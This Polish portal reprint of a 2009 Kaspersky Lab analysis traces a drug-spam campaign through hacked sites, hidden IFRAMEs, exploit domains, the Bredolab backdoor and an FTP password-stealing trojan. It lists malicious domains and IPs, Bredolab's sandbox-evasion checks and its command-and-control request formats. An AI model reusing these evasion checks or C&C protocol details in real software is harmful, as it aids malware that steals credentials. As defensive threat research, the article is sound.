PRNews.pl - banki, karty, konta oraz marketing i public relations

Najświeższe informacje z PRNews.pl w Twojej skrzynce!

Codziennie aktualne wiadomości ze świata finansów.

Zapisz się na nasz Newsletter ​i bądź na bieżąco z nowościami z branży!

  • Raporty
  • Instytucje
    • Aion Bank
    • Alior Bank
    • Bank BPS
    • Bank Millennium
    • Bank Ochrony Środowiska
    • Bank Pekao SA
    • Bank Pocztowy
    • Banki spółdzielcze
    • BGK
    • Biuro Informacji Kredytowej
    • BNP Paribas
    • Citi Handlowy
    • Compensa
    • Credit Agricole
    • Deutsche Bank
    • DNB
    • EuropAssistance
    • ING Bank Śląski
    • KIR
    • Klarna
    • Link4
    • Mastercard
    • mBank
    • Mondial Assistance
    • mPay
    • Nationale-Nederlanden
    • Nest Bank
    • PKO BP
    • PKO Leasing
    • Plus Bank
    • PolCard from Fiserv
    • Polski Standard Płatności
    • Pru
    • PZU
    • Raiffeisen Digital Bank
    • Revolut
    • Santander Bank Polska
    • Santander Consumer Bank
    • SGB
    • Standard Chartered Polska
    • Toyota Bank Polska
    • Trade Republic
    • UniCredit
    • VeloBank
    • Visa
    • Volkswagen Bank Oddział Polska
    • Warta
    • Zen.com
  • Produkty
    • Bankowość internetowa
    • Bankowość mobilna
    • Oszczędzanie
    • Bezpieczeństwo
    • Karty
    • Kredyty
    • Konta
    • Płatności mobilne
    • Ubezpieczenia
  • Analizy
  • Kariera w finansach
  • Szkolenia
  • Forum
  • Newsletter
PRNews.plWiadomościMarketing i PRFabryka pieniedzy – Kaspersky Lab o botnetach i nie tylko

Fabryka pieniedzy – Kaspersky Lab o botnetach i nie tylko

Marketing i PR 27.10.2009 (06:42) artykuł nadesłany

Artykuł ten stanowi analizę jednej wiadomości spamowej i przedstawia metody stosowane dzisiaj przez cyberprzestępców w celu tworzenia botnetów i przeprowadzania masowych wysyłek spamowych. Opisane metody i techniki są bez wątpienia nielegalne, a cyberprzestępcy wykorzystują je w jednym celu: aby się wzbogacić.

Spam

Na początku lata 2009 roku laboratorium filtrowania zawartości firmy Kaspersky Lab zaczęło otrzymywać e-maile, które na pierwszy rzut oka wydawały się typowymi wiadomościami spamowymi. E-maile promowały leki i wykorzystywały standardowy format, który zawierał HTML oraz osadzone obrazy:


Przykład spamu wysłanego do [email protected]

Jednak wiadomości te posiadały jedną cechę, która wyróżniała je na tle innego spamu. Zawarte w nich odsyłacze nie prowadziły do stron spamerów, ale stron HTML-owych na legalnych portalach.

Domeny w odsyłaczach różniły się w zależności od wiadomości, jednak ścieżka do serwera była zawsze taka sama: “1/2/3/4/buy.html.”

 
Tekst źródłowy e-maila zawierającego odsyłacze do legalnych stron internetowych

Wszystkie strony, do których prowadziły odsyłacze, zawierały jednowierszowy plik HTML ze znacznikiem META refresh. Znacznik ten był wykorzystywany do przekierowywania użytkownika na inną stronę – w tym przypadku, sklep internetowy sprzedający leki reklamowane przez spamerów.


 

Tekst źródłowy stron internetowych, które przekierowują użytkowników na stronę spamerską

 
Strona, na jaką zostali przekierowani użytkownicy


Jedną z metod wykorzystywanych do wykrywania spamu jest czarna lista nazw domen, do których prowadzą odsyłacze w wiadomościach spamowych. Pozwala to wykrywać wszystkie wiadomości wysyłane w masowych wysyłkach, niezależnie od tekstu w treści wiadomości. Jednak w tym przypadku, domeny, do których prowadziły odsyłacze w wiadomości, nie mogły zostać umieszczone na czarnej liście, ponieważ odsyłacze prowadziły do legalnych stron internetowych. Co więcej, każdego dnia nasi analitycy identyfikowali kolejnych 10 nowych domen. Ta metoda obchodzenia filtrów spamowych znana jest spamerom od wielu lat, jest jednak rzadko wykorzystywana, ponieważ wiąże się z wyższymi kosztami niż zakup nowych domen.

Strony internetowe, do których prowadziły odsyłacze, zostały prawdopodobnie zhakowane i były wykorzystywane przez cyberprzestępców do przekierowywania użytkowników na strony spamerów. Wciąż jednak nie wiedzieliśmy, w jaki sposób cyberprzestępcy zdołali włamać się na tak wiele stron.

Strony internetowe

Włamanie się przy użyciu standardowych metod nie byłoby możliwe w przypadku większości z tych stron. Szybka analiza zhakowanych zasobów nie ujawniła żadnych wspólnych luk w zabezpieczeniach. Do stworzenia tych stron nie wykorzystano również tych samych technologii itd. Ponadto, większość z nich nie zawierała żadnych skryptów, a jedynie HTML. Jedyną rzeczą, jaka je łączyła, był folder zawierający plik „buy.html”. Zawierał on znacznik HTML, który przekierowywał użytkowników do sklepu internetowego spamerów, w którym sprzedawane były lekarstwa.

Jednak dogłębna analiza jednej ze zhakowanych stron ujawniła dobrze ukrytą ramkę IFRAME, która przekierowywała do strony o nazwie b9g.ru. Podziałało to jak światełko ostrzegawcze: IFRAME odsyłający do podejrzanych stron internetowych jest często wykorzystywany przez cyberprzestępców do infekowania komputerów przy użyciu exploitów.

 
Zhakowana strona


Analiza ujawniła, że b9g.ru znajduje się pod pięcioma różnymi adresami IP:

77.37.20.130
90.156.144.78
77.37.19.173
77.37.19.179
oraz 77.37.19.205.

Po zebraniu informacji o domenach, które również zostały zarejestrowane pod tymi adresami, zdołaliśmy zidentyfikować domeny, gdzie adresy były wykorzystywane do umieszczenia ramki IFRAME na zhakowanych stronach: a31.ru, b5r.ru, b5z.ru, b7p.ru, b8o.ru, b9g.ru, c6y.ru, c8k.at, f5l.at, f5x.at itd. Potwierdziło to nasze podejrzenia odnośnie zagrożenia, jakie stanowi ramka IFRAME wykryta na zhakowanej stronie.

Exploity

Kolejnym krokiem było zidentyfikowanie, jakie programy były pobierane na komputery użytkowników ze strony http://b9g.ru:****/*****.php. Tak jak się spodziewaliśmy, już po pierwszym odwiedzeniu tej strony na nasz komputer zostały pobrane exploity wraz z index.php. Cyberprzestępcy wykorzystali szereg różnych luk w zabezpieczeniach oprogramowania; największe zagrożenie stanowiły exploity wykorzystujące luki w zabezpieczeniach PDF.

 

 
Zaszyfrowany i niezaszyfrowany index.php

Bot

Dzięki wykorzystaniu luk w zabezpieczeniach pobrany został program Backdoor.Win32.Bredolab. Szkodnik ten wykorzystuje technologie rootkit, pobiera i instaluje inne szkodliwe programy.

 
Fragment zrzutu zawartości pamięci rootkita downloadera


Bredolab przeciwdziała próbom uruchomienia go w piaskownicy, sprawdzając, czy istnieje

  • Nazwa użytkownika, taka jak: USER, user, CurrentUser, Sandbox;
  • Nazwa komputera SANDBOX;
  • Ciąg VBOX w HKLMHARDWAREDescriptionSystemSystemBiosVersion
  • Następujące wartości w kluczu ProductID w HKLMMicrosoftWindowsCurrentVersion:
    • 55274-640-2673064-23950 (JoeBox)
    • 76487-644-3177037-23510 (CWSandbox)
    • 76487-337-8429955-22614 (Anubis)

Jeżeli jeden z tych warunków zostanie spełniony, szkodliwy program przestanie działać.

Bredolab przestaje również działać, jeżeli na zainfekowanym komputerze jest zainstalowany COMODO Firewall.

W przeciwnym razie Bredolab kopiuje się do %Temp%~TM27FB4A.TMP, wstrzykuje swój kod do explorer.exe, uruchamia nowy wątek i przenosi się do %Temp%~TM%TempName%. Następnie bot uruchamia się w tym wątku, a pierwotny proces zostaje zakończony.

Po tym, jak bot skutecznie połączy się z centrum kontroli, wysyła żądanie GET:

GET /l/controller.php?action=bot&entity_list={liczby oddzielone przecinkami &uid=11&first={0|1}&guid={VolumeSerialNumber} &uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

W odpowiedzi serwer przekazuje zaszyfrowane programy do bota. Programy te mogą następnie zostać zapisane do nowego pliku, %Windows%Tempwpv%rand_number%.exe, który jest następnie uruchamiany, lub do nowo stworzonego procesu svchost.

 
Przykład zaszyfrowanej wiadomości z centrum kontroli

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2009 17:08:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 55709
Entity-Info: 1241530597:32768:1;1246898982:22941:2;
Rnd: 982101
Magic-Number:
32|1|187:55:66:132:143:54:243:114:97:146:132:5:192:141:199:113:160:130:101:
167:50:61:32:107:127:128:84:144:169:61:158:100:…

Odpowiedź centrum kontroli. Klucz deszyfrujący znajduje się w polu Magic Number.

Bot informuje właściciela botnetu o swoich działaniach, wysyłając żądanie GET:
GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11& entity={number:unique_start|
unique_failed|repeat_start|repeat_failed;number:…}

Trojany kradnące hasła

Po tym, jak bot połączy się z centrum kontroli, zainfekowany system pobiera i instaluje program o nazwie Trojan-PSW.Win32.Agent.mzh. Szkodnik ten kradnie hasła do klientów FTP.

 
Odszyfrowany kod trojana kradnącego hasła do klienta FTP


Skradzione hasła do klienta FTP są następnie wysyłane na następujący adres:

 
Lokalizacja serwera, na który są wysyłane skradzione hasła


Sytuacja była jasna. Cyberprzestępcy nie próbowali włamywać się na strony internetowe przy użyciu wstrzykiwania SQL lub exploitów atakujących silniki stron – zamiast tego kradli po prostu hasła do klientów FTP w celu przejęcia kontroli nad zawartością stron.

Według informacji o trojanie Trojan-PSW.Win32.Agent.mzh zamieszczonych na forach dla hakerów, wynaleziono system umożliwiający kradzież haseł do stron; trojan ten stanowił część tego systemu, który można było kupić za 2 000 dolarów.

Pobieranie innych szkodliwych programów

Tydzień później, centrum kontroli botnetu wydało polecenie pobrania botów w celu wysyłania spamu: wśród botów znajdowały się tak znane szkodniki, jak Rustock (Backdoor.Win32.HareBot) i Pushdo(Backdoor.Win32.NewRest.aq).

Po upływie kolejnego tygodnia na zainfekowanych maszynach zostały zainstalowane również programy z rodziny Koobface oraz fałszywy program antywirusowy.

Plan ataku

Niewielkie badanie, które rozpoczęło się od spamu wysłanego na adres [email protected], ujawniło, w jaki sposób działają cyberprzestępcy:

 
Etapy włamywania się na strony internetowe i przeprowadzania masowych wysyłek spamowych


System ten pokazuje technologie i techniki często stosowane do tworzenia botnetów wykorzystywanych do wysyłania masowych wysyłek spamowych:

  1. Włamanie się do legalnych zasobów.
  2. Umieszczenie na zhakowanych portalach stron, które przekierowują do stron spamerów.
  3. Umieszczenie na zhakowanych portalach odsyłaczy do exploitów.
  4. Tworzenie botnetu z komputerów, które zostały zainfekowane w wyniku odwiedzenia zhakowanych stron.
  5. Kradzież haseł użytkowników do stron internetowych.
  6. Pobieranie botów spamowych w celu przeprowadzania masowych wysyłek i innych szkodliwych programów na komputery w botnecie.

Metody te zapewniają płynne działanie procesu, który w idealnym świecie cyberprzestępczym jest cykliczny.

Wnioski

Wysyłanie spamu zawierającego odsyłacze do zhakowanych i zainfekowanych stron internetowych jest powszechną praktyką. Co godzinę identyfikujemy dziesiątki nowych adresów tego typu.


Przykład wiadomości e-mail zawierającej odsyłacz do strony na zhakowanym portalu internetowym

 
Tekst źródłowy sekcji HTML-owej e-maila


Odsyłacz (http://…/1.html) wskazuje na stronę na zhakowanym portalu internetowym, która zawiera znacznik przekierowujący do sklepu internetowego sprzedającego lekarstwa.

Spamerzy stosują tego rodzaju taktyki w wielu różnych wiadomościach e-mail, zmieniając nazwę strony, do której są przekierowywani użytkownicy i dostarczając szereg różnych exploitów przy użyciu IFRAME. Jednak główny cel jest zawsze taki sam: wszystkie stosowane technologie są wykorzystywane do zarabiania pieniędzy.

I jeszcze jedno…

W lipcu tego roku pojawiły się informacje o włamaniu się na stronę Torrentreactor. Cyberprzestępcy wykorzystali znaczniki, które przekierowywały do strony zawierającej exploity; było jasne, że do włamania się wykorzystano szkodliwy program stworzony w celu kradzieży haseł do FTP-a.

 
Fragment zhakowanej strony Torrentreactor.net

Jest to kolejny przykład wielu podobnych przypadków włamań hakerskich.

Źródło: Kaspersky Lab

internet it 2009-10-27
Redakcja PRNews.pl
Tagi: internet it

Sprawdź także:

a 0 Nowe oferty promocyjne ubezpieczeń komunikacyjnych i nieruchomości w Alior Banku
05.12.2025 (04:16) – informacja prasowa

Nowe oferty promocyjne ubezpieczeń komunikacyjnych i nieruchomości w Alior Banku

Alior Bank wprowadza dwie nowe promocje ubezpieczeniowe w ramach współpracy z LINK4. Akcje potrwają do 31 grudnia …

a 0 XV edycja Programu Grantów Lokalnych Banku BNP Paribas – 500 000 zł trafi do organizacji wzmacniających swoje społeczności
05.12.2025 (04:14) – informacja prasowa

XV edycja Programu Grantów Lokalnych Banku BNP Paribas – 500 000 zł trafi do organizacji wzmacniających swoje społeczności

Bank BNP Paribas rusza z piętnastą edycją Programu Grantów Lokalnych – inicjatywy, która od 2011 roku wspiera …

a 0 Revolut udostępnia “Tryb Uliczny”. Ma chronić środki klientów przed atakami złodziei podczas sezonu świątecznego
05.12.2025 (04:09) – informacja prasowa

Revolut udostępnia “Tryb Uliczny”. Ma chronić środki klientów przed atakami złodziei podczas sezonu świątecznego

Revolut udostępnił w krajach EOG i Wielkiej Brytanii (również w Polsce) nową funkcję bezpieczeństwa: “Tryb …

a 0 ING na 9. Śląskim Festiwalu Nauki Katowice
05.12.2025 (04:07) – informacja prasowa

ING na 9. Śląskim Festiwalu Nauki Katowice

Fundacja ING Dzieciom wspólnie z ING Bankiem Śląskim zapraszają dzieci, młodzież i dorosłych do Katowic, na kolejne …

a 0 Hitachi Europe i ITCARD nawiązują strategiczne partnerstwo
05.12.2025 (04:06) – informacja prasowa

Hitachi Europe i ITCARD nawiązują strategiczne partnerstwo

Hitachi Europe Ltd. i ITCARD S.A. zawarły strategiczne partnerstwo w celu przyspieszenia innowacji i transformacji …

a 0 ERGO Hestia i Akademia Leona Koźmińskiego przedłużają strategiczne partnerstwo na kolejne trzy lata
05.12.2025 (04:02) – informacja prasowa

ERGO Hestia i Akademia Leona Koźmińskiego przedłużają strategiczne partnerstwo na kolejne trzy lata

Grupa ERGO Hestia i Akademia Leona Koźmińskiego podpisały umowę o kontynuacji strategicznego partnerstwa na lata …

PRNews.pl

Zobacz również

Kup teraz, zapłać później. Po trzech miesiącach Citi da Ci najnowszego Apple Watcha

Kup teraz, zapłać później. Po trzech miesiącach Citi da Ci najnowszego Apple Watcha

Nowy Apple Watch SE 3 to gadżet,…

mBank rozszerza cyfrową hipotekę. Nowy kredyt na mieszkanie z rynku wtórnego w kilkanaście minut

mBank rozszerza cyfrową hipotekę. Nowy kredyt na mieszkanie z rynku wtórnego w kilkanaście minut

Niespełna trzy miesiące po starcie cyfrowej hipoteki…

Raport: Liczba kont osobistych w bankach – III kwartał 2025 r.

Raport: Liczba kont osobistych w bankach – III kwartał 2025 r.

Rynek rachunków oszczędnościowo-rozliczeniowych w złotych po III…

Te banki mają najwięcej aktywnych użytkowników Blika. Dane po III kw. 25

Te banki mają najwięcej aktywnych użytkowników Blika. Dane po III kw. 25

Z zebranych danych bankowych wynika, że po…

Raport: Liczba klientów mobile only w bankach – III kwartał 2025 r.

Raport: Liczba klientów mobile only w bankach – III kwartał 2025 r.

Liczba klientów „mobile only”, czyli osób, które…

Raporty PRNews.pl

Raport PRNews.pl: Aktywa banków – I kw. 2022 r.

Raport PRNews.pl: Aktywa banków – I kw. 2022 r.

Większość banków może się pochwalić wzrostem poziomu…

Raport PRNews.pl: Liczba obcokrajowców wśród klientów banków – I kw. 2022 r.

Raport PRNews.pl: Liczba obcokrajowców wśród klientów banków – I kw. 2022 r.

W pierwszym kwartale 2022 r. liczba obsługiwanych…

Raport PRNews.pl: Rynek kredytów hipotecznych – I kw. 2022

Raport PRNews.pl: Rynek kredytów hipotecznych – I kw. 2022

Pierwszy kwartał 2022 r. przyniósł spadek sprzedaży…

O tym mówią bankowcy

Ostatnie komentarze

avatar komentującego

Avo Men:

Żadna nowość. To samo Sobieraj zrobil w Aliorze… Tylko jak potem trzeba było …

wt., 18 lis 2025 (12:09) • UniCredit wywraca stolik. Wszystkie najważniejsze usługi za darmo i bez „gwiazdek”

avatar komentującego

Avo Men:

Bla bla … spadek Klientów Indywidualnych pominięty … …

niedz., 9 lis 2025 (22:50) • 696 mln zł zysku netto Grupy Kapitałowej BNP Paribas Bank Polska w III kw. 2025 r.

avatar komentującego

Maciej Kusznierewicz:

Cel inflacyjny RPP mieści się w przedziale 1,5-3,5 proc. (a nie 1-3 proc., …

czw., 9 paź 2025 (11:32) • Kredyty miały być tańsze od listopada, będą już teraz. Stopy procentowe w dół [komentarz]

avatar komentującego

PRNews_pl:

Przecież na PRNews.pl (co sama nazwa serwisu wskazuje) od jakichś 25 lat publikuję …

pt., 12 wrz 2025 (06:12) • Rzecznik generalny TSUE: WIBOR zgodny z prawem

avatar komentującego

Bart Ikswe:

No profesjonalna i rzetelna opinia...przedrukowana od Związku Banków Polskich 🤯 na dole artykułu …

pt., 12 wrz 2025 (06:07) • Rzecznik generalny TSUE: WIBOR zgodny z prawem

  • SMART Bankier
  • Kredyt konsolidacyjny
  • Pożyczki na raty
  • Konto firmowe
  • Kurs inwestowania
  • Kalkulator brutto netto
  • Kalkulator kredytu gotówkowego
  • Kalkulator zdolności kredytowej
  • Rozlicz najem w PIT-28
  • pit 37 online na pit.pl
  • Rozliczenie pit
  • Program pit
  • Pit 11
  • Promocje bankowe
  • Promocje Pekao S.A.
  • Promocje BNP Paribas
  • Promocje Citi Handlowy
  • Promocje Alior Bank
  • Promocje Santander Bank
  • Promocje PKO BP
  • Promocje Millenium
  • Promocje ING Bank Śląski
  • Promocje mBank
  • Promocje Velobank
  • Promocje Nest Bank
  • O nas
  • Kontakt
  • Reklama
  • Newsletter
  • Prześlij informację
  • RSS
  • zgarnijpremie.pl
Bonnier Business Polska Bankier.pl – Portal Finansowy – Rynki, Twoje finanse, Biznes PIT.pl -Podatki dla małych firm i osób fizycznych, rozliczenia roczne Systempartnerski.pl - system afiliacyjny Bankier.pl PRNews.pl - banki, karty, konta oraz marketing i public relations Mambiznes.pl - Pomysł na biznes, Własna firma, Biznes plan Dyskusja.biz - Blogi o biznesie, artykuły biznesowe Puls Biznesu pb.pl - rynek, akcje, spółka, przedsiębiorca, budżet Pulsmedycyny.pl - Portal lekarzy i pracowników służby zdrowia Pulsfarmacji.pl - Portal aptekarzy, techników i pracowników sektora farmaceutycznego
© 2008 − 2025 PRNews.pl. Korzystanie z portalu oznacza akceptację regulaminu. Informacja o cookies. Polityka prywatności

Bezpłatny newsletter PRNews.pl

  • PRNews.pl to najbardziej opiniotwórczy serwis w branży bankowej. Przekonaj się dlaczego!
  • Codziennie rano otrzymasz skrót najważniejszych informacji ze świata finansów
  • Dzięki temu będziesz zawsze wiedział o nowych produktach, promocjach i usługach bankowych, ubezpieczeniowych i inwestycyjnych
  • Aktualne wiadomości z prasy i z samych instytucji finansowych - zupełnie bezpłatnie, wprost na twoją skrzynkę mailową
Zapisz się na newsletter:

Dołącz już dziś do niemal 38 tys. odbiorców